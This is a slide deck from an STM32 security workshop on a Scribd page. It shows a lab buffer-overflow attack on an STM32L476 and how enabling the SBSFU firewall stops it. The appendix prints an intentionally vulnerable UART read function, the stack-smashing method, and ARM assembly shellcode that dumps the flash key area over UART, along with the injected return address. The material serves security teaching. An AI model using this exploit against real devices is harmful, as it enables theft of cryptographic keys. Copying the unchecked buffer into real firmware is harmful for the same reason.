0% found this document useful (0 votes)
98 views35 pages

05-STM32 - Security - WS - Adding Protections

Uploaded by

soloking
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
98 views35 pages

05-STM32 - Security - WS - Adding Protections

Uploaded by

soloking
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 35

STM32 Security Workshop

05 Adding protections
Adding protections hands-on

• Purpose :
• Experience a code injection attack
• Activate counter measure included in
SBSFU (Isolation) UART

• Hands-on scenario
• Experiment real code injection attack
• Activate firewall mechanism in SBSFU as
counter-measure

05-2
What is an inner attack?

• The principle is
• Exploit a software weakness
• Inject malicious code
• Example : the buffer overflow
• Send more data than expected
• Software does not check the limit (weakness/bug)
• Results in data can be written at unexpected location
• Impacts system behaviour

05-3
Simple example

• Receive command terminated by \n via UART


• Software only checks \n to detect end of command
• What is the possible weakness here ?
• => The command received may be longer than expected !

05-4
Let’s build this weak code

• Open project C:\STM32SecuWS\L4\STM32L476_SimpleApp_WithWeakness

Open

Build
Check

3
05-5
SBSFU security protection management

• By default SBSFU is delivered with all protections activated


• Isolation protections need to be removed for our experiment
• SBSFU provides one configuration file to setup all security protections
• Let’s change this app_sfu.h file!

05-6
Open app_sfu.h from
STM32L476RG_NUCLEO_2_Images_SBSFU

05-7
Comment #define using Toggle Comment

Select the block


from line 151 to
170

2
05-8
Block commented

Check line 170 is


the last line
commented 05-9
Restore some protections

To Double click
uncomment to get code
manually snippet &
copy paste

app_sfu.h

WARNING ! CTRL-S
Save file after modification !
05-10
Rebuild SBSFU
2

3
05-11
Launch postbuild script

• 03_01_Postbuild_SimpleApp_WithWeakness.bat
• To combine SBSFU, UserApp_WithWeakness and header

05-12
Update the target
• 00_ResetL4Target.bat
• 03_02_Flash_SBSFU_SimpleApp_WithWeakness.bat

05-13
Restart the board

• Power on reset the board and then press reset button

05-14
Check application is working

• Type command manually and press return


• Firmware will send “Message Received” and ask for new command

05-15
Now everything is ready !

• We have an application firmware including a weakness


• This application is authenticated by SBSFU
• But remember we removed some protections
• We are in the field and hacker is attacking the device
• The injected code will read the flash content and write it to UART
• The address in flash points to key area for this example

05-16
Send hack.bin to target
3

Go to :
C:\STM32SecuWS\L4\STM32L476_SimpleApp_WithWeakness

4
5

05-17
Attack performed!

Hack reads the secret area and output it to UART


05-18
Reset after hack performed

Reset after hack performed because of watchdog

05-19
Conclusion

• We performed a hack using a simple UART interface


• Interfaces with outside world means surface of attack
• Each open door is a way for hacker to tamper your assets !
• This demonstrates why isolation is very important !

05-20
How SBSFU addresses Isolation

• SBSFU uses all available isolation mechanisms


• On STM32L4 we have
• The Firewall : Hardware mechanism that protects Flash and RAM specific areas
• The MPU : Cortex-M mechanism to give attributes to set of address range
• The PCROP : Set a specific part of flash in execute only (no read nor write)
• We will see what happens when activating the firewall
• But first a reminder of all protections applied by SBSFU

05-21
SBSFU protection on STM32L4

User Flash SRAM1


Keys Secure Engine : Stack
Secure Engine Secure Engine
Code & constants Vdata

SBSFU SBSFU
Code & constants Vdata/Stack/Heap
---
Active image Legend
Download Image header Vdata/Stack/Heap
DAP
DAP WRP + MPU-RX
Download Image
FWALL (code) + WRP + MPU-RX
Active image header
FWALL (code) + WRP + PCROP + MPU-RX

Active Image FWALL (NVData) + MPU-RW

SWAP area FWALL (VData) + MPU-RW

IWDG MPU-RW (code/data)


DAP R: Read
RDP-L2 W: Write
Tamper X:
eXecute

05-22
Activate firewall

• To activate the firewall


go back to app_sfu.h

1
Uncomment Firewall activation

CTRL-S

05-23
Rebuild SBSFU
2

05-24
Use scripts to prepare and flash the board

• As already done previously, launch scripts


• 00_ResetL4Target.bat
• 03_01_Postbuild_SimpleApp_WithWeakness.bat
• 03_02_Flash_SBSFU_SimpleApp_WithWeakness.bat
• Then power on reset the board when following message is displayed

05-25
Perform the attack again

3
4

05-26
Result with FIREWALL

When hack code is trying to access to secrets,


a reset is generated.

Firewall was triggered.

• SBSFU provides a framework for implementing your own specific action upon
detection of firewall reset
05-27
That’s all for this hands-on

What did we learn ?


• Using a stack overflow can be used to inject code
• It is important to be able to isolate
• the critical parts (crypto related for instance)
• from the pure functional parts (communication)
• SBSFU implements all possible mechanisms to perform this
isolation
• SBSFU combines all these mechanisms

05-28
Thank you !

Thank you

© STMicroelectronics - All rights reserved.


The STMicroelectronics corporate logo is a registered trademark of the STMicroelectronics
group of companies. All other names are the property of their respective owners. 29
Appendix
How attack is actually performed
The weak code !
static void ReadUARTBuffer(void) ReadUARTBuffer:
{ push {r7, lr}
uint8_t buffer[48] = { 0 }; sub sp, #48 ; 0x30 At function entry the
indexBuffer=0; add r7, sp, #0 compiler pushes the
... return address and 1
while (1)
working register on the
{
stack and uses also the
if (HAL_UART_Receive(&huart2, &recChar, 1, 1000) == HAL_OK)
stack to allocate the local
{
variables.
if (recChar == '\n')
{
HAL_UART_Transmit(&huart2, (uint8_t *)"Message received\n", 17, 1000);
break;
}
else
{
buffer[indexBuffer] = recChar;
indexBuffer++; Then, at the end of the
... function, the local
} adds r7, #48 ; 0x30
} variables are ‘dis
mov sp, r7 allocated’ and register
IWDG->KR= IWDG_KEY_RELOAD; pop {r7, pc}
} and return address
} restored

05-41
How the stack looks like in such case
End of stack (low addresses)

Available stack

Buffer[0] First element of the buffer



Buffer[N-1] Last index of the buffer. UART command read shouldn’t go further
R7
2 last words on the stack may be overwritten if attacker sends enough data.
LR (return address)
This is where the attack can take place
Stack from caller

Beginning of stack : High address

05-42
How the attack can be performed ?

Remaining stack

Buffer[0]

… Malicious code can be injected here

Buffer[N-1]
R7
LR (return address) • The last word (LR) is the return address.
• Attacker can replace it with the address of the beginning of his
Stack from caller
assembly code

05-43
Example of assembly code for attack
Purpose of this code: read flash content and send it on UART
hack:
start:
CPSID I // disable interrupts
MOV R2, #0x441C // UART_ISR register address
MOVT R2, #0x4000
MOV R3, #0x03F0 // Flash address containing keys
MOVT R3, #0x0800
MOV R4, #256 // Number of bytes to read
send_byte:
LDRB R1, [R3], #1 // Read one byte in flash
STRB R1, [R2, #12] // Send byte to UART_TDR register
wait_complete:
LDR R6, [R2, #0] // Read UART ISR
ANDS R6, R6, #64 // Check End of Transmit flag
CMP R6, #0 // R6 is 0 if character not transmitted yet
BEQ.N wait_complete
SUB R4, R4, 1
CMP R4, #0
BNE send_byte // R6 different from 0, we can send next byte
NOP // NOP to be added to fit the exact buffer size
NOP
NOP 05-44
.end
From hack code to data injected

• The hacking code is assembled to obtain the binary data to be injected


• Then, most complex thing is to find the additional content in overflow part
• This additional part should contain the address to jump to.
• Finding this address requires trial and error and could be long

Content of
hack.bin

Return address : 0x20017FC1


At beginning of the buffer on the stack
05-45

You might also like